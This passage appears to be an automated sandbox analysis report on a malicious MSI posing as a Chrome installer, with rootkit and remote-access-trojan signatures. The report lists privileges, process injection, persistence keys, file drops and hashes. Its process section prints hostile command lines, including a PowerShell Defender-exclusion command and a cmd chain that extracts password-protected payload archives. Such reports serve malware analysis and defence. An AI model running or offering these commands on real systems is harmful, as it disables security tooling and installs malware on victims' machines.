Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: 35 N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: 35 N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2396 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 2396 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 2396 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 2396 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 2396 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 1288 wrote to memory of 2908 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2908 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2908 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 1728 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 1288 wrote to memory of 1728 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 1288 wrote to memory of 1728 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 1728 wrote to memory of 1708 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 1728 wrote to memory of 1708 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 1728 wrote to memory of 1708 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 1728 wrote to memory of 1708 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 1728 wrote to memory of 620 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1728 wrote to memory of 620 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1728 wrote to memory of 620 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1728 wrote to memory of 2524 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 1728 wrote to memory of 2524 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 1728 wrote to memory of 2524 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 1728 wrote to memory of 2524 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 1288 wrote to memory of 2652 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 1288 wrote to memory of 2652 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 1288 wrote to memory of 2652 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 1288 wrote to memory of 2652 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\ChromeSetupz.5516.25.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "000000000000005C" "0000000000000558"

C:\Windows\system32\MsiExec.exe

C:\Windows\system32\MsiExec.exe -Embedding 24DBB2A1855E59B6F8A4A032F90EAD22 M Global\MSI0000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\DriveHumbleTechnician'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe" x "C:\Program Files\DriveHumbleTechnician\XSMdjOpzlHEtnonzAHdFfqjsKAHetr" -o"C:\Program Files\DriveHumbleTechnician\" -p"373357|xZmCie].{GTlD" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe" x "C:\Program Files\DriveHumbleTechnician\eaKqUwGXuXSKSERTyFiFfxKGAgTAir" -x!1_yrjwPObnoqyg.exe -o"C:\Program Files\DriveHumbleTechnician\" -p"91844v.Gsd9S^{PzzOfj" -y

C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe

"C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe" x "C:\Program Files\DriveHumbleTechnician\XSMdjOpzlHEtnonzAHdFfqjsKAHetr" -o"C:\Program Files\DriveHumbleTechnician\" -p"373357|xZmCie].{GTlD" -y

C:\Windows\system32\PING.EXE

ping 127.0.0.1 -n 2

C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe

"C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe" x "C:\Program Files\DriveHumbleTechnician\eaKqUwGXuXSKSERTyFiFfxKGAgTAir" -x!1_yrjwPObnoqyg.exe -o"C:\Program Files\DriveHumbleTechnician\" -p"91844v.Gsd9S^{PzzOfj" -y

C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe

"C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe" -number 121 -file file3 -mode mode3

C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe

"C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 im.qq.com udp

Files

memory/1288-12-0x00000000004F0000-0x0000000000500000-memory.dmp

memory/2908-17-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

memory/2908-18-0x0000000001F30000-0x0000000001F38000-memory.dmp

C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe

MD5 c31c4b04558396c6fabab64dcf366534
SHA1 fa836d92edc577d6a17ded47641ba1938589b09a
SHA256 9d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3
SHA512 814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99

C:\Program Files\DriveHumbleTechnician\XSMdjOpzlHEtnonzAHdFfqjsKAHetr

MD5 4f8c76acd4909457be94c24638d582ad
SHA1 aa8c712b920ccf8c50de26f32fc1e4cc471bc8eb
SHA256 69dfc5f0598bee73b850e4b8958ad345188b99767f674f1f54dc1a68a270595f
SHA512 c7a7ca2a882446191b1a961011b59deca8849ca8ae71cde19cdced727a3a9883efe7b5c1f5a247bb39c3b19f08d7da28db102d76da1627d69613c3d6dd7dc6cf

C:\Program Files\DriveHumbleTechnician\eaKqUwGXuXSKSERTyFiFfxKGAgTAir

MD5 277d195bb1d050281da36e259c851e0c
SHA1 e5281f027d44e6da9eb041acfaaf0404db6ba1d8
SHA256 2b189cd2b037480fc4eada82dc53d2339327372c9979dba7fa7b66c8b7e11652
SHA512 d499fd7fbf37421736deb1d96011707a3709b8c59294b37afd5e50fd2664fccdc2e75258816e3c9526f45e1716a18b9ad72e94dfa555d1f44a3baadb9cbbb77b

C:\Program Files\DriveHumbleTechnician\2_yrjwPObnoqyg.exe

MD5 d9a41a6ce1809032f7e409a79766fbe6
SHA1 c011b1122fb750ce3b393fc35df623d7fb21ebaa
SHA256 0099f9e565c7bb368d24fa3e497fb6cad33463ef13a02017f8d072bfb7185520
SHA512 23d324a40aca1ecc022a42646826632d43c67496722004fe155df7d76e1175a02a3a69595606d452834ad61cbc119fa4fe8c98b7a39845b4fefaece34d4a92e1

C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe

MD5 5adff4313fbd074df44b4eb5b7893c5e
SHA1 d27388ef6cf34d40e0e7666f6381fcc5bbafa0f7
SHA256 d0c7a4390bdd6b442b96fc76f8a38f7b756ba2c16752ea259844420161865cae
SHA512 f5d639922b91878cf83d97563288a3aa4cba94db3ad5e8ac11d24ef7c44b019383a4414aeba6171b4c7bfa83ea1eafc1231cc9233e3b82b5ca7dc0b3ffacbf60

C:\Config.Msi\f76fbaf.rbs

MD5 0f42b5d9f26491d750e86c977b647358
SHA1 75e5f6ec305fac5312eed841a03b966529ac5edc
SHA256 ffea657e8eb6a528e857f80ac637ae2ac458eab5e0ea844d73ed5ae8d8e29c28
SHA512 2e3c41f3c7fddf8b9fd7cb2bb67fc8d7464e4f19bfe398dbcefa700af397550f01b8ef9eb57871b7305551cd14bf43c983fcdc0d1403c58b221988f5cfbb3433

C:\Windows\Installer\f76fbad.msi

MD5 92f66429d4ad77c68f77060cb18dcce0
SHA1 cde034910f4ad24df46f6bc7e4e6d467ac8baa31
SHA256 08734e0c77e055be3c43066f2cbcfd84537a819434d1e1f6d41c984ff7a4d865
SHA512 de04850632071600f6d1b9efaa3d4272ef4176e474ab8feb0caf029c300fb4c0d5a0d9f28a037c4b61a9ddaa9ca2fc89d82f09c414bffc9580935b05f1b59cc7

memory/2652-56-0x000000002B0E0000-0x000000002B10F000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-18 09:55

Reported

2024-11-18 09:58

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

154s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\ChromeSetupz.5516.25.msi

Signatures

Detect PurpleFox Rootkit

rootkit
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gh0st RAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gh0strat

rat gh0strat

Gh0strat family

gh0strat

PurpleFox

rootkit trojan purplefox

Purplefox family

purplefox

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\ = "Google Chrome" C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\StubPath = "\"C:\\Program Files\\Google\\Chrome\\Application\\130.0.6723.117\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level --channel=stable" C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Localized Name = "Google Chrome" C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\IsInstalled = "1" C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Version = "43,0,0,0" C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\O: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\V: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\L: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\X: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\K: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\S: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\W: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\R: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_841DF67C840691A847835C0F760B4DC0 C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_841DF67C840691A847835C0F760B4DC0 C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PpMCUaskmPAB.exe.log C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Checks installed software on the system

discovery

Checks system information in the registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\sk\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\hu\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files (x86)\Google\GoogleUpdater\prefs.json C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File created C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\_metadata\verified_contents.json C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\et.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\fil.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\PrivacySandboxAttestationsPreloaded\manifest.json C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File opened for modification C:\Program Files\Crashpad\settings.dat C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File opened for modification C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\zu\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\zh_CN\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\manifest.fingerprint C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\bg.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\uk.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\GoogleUpdater\prefs.json~RFe58e932.TMP C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\pa\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files (x86)\Google\GoogleUpdater\updater.log.old C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
File opened for modification C:\Program Files (x86)\Google\GoogleUpdater\updater.log C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe N/A
File created C:\Program Files (x86)\Google\GoogleUpdater\f66e3c9a-e629-43a2-9c88-be81f7fbbe16.tmp C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\resources.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\offscreendocument.html C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad\metadata C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\dxil.dll C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\bn.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\VisualElements\SmallLogoBeta.png C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\fr_CA\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\eu\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files (x86)\Google\GoogleUpdater\769035ab-fd69-4a33-bedf-99680dc5e6e1.tmp C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
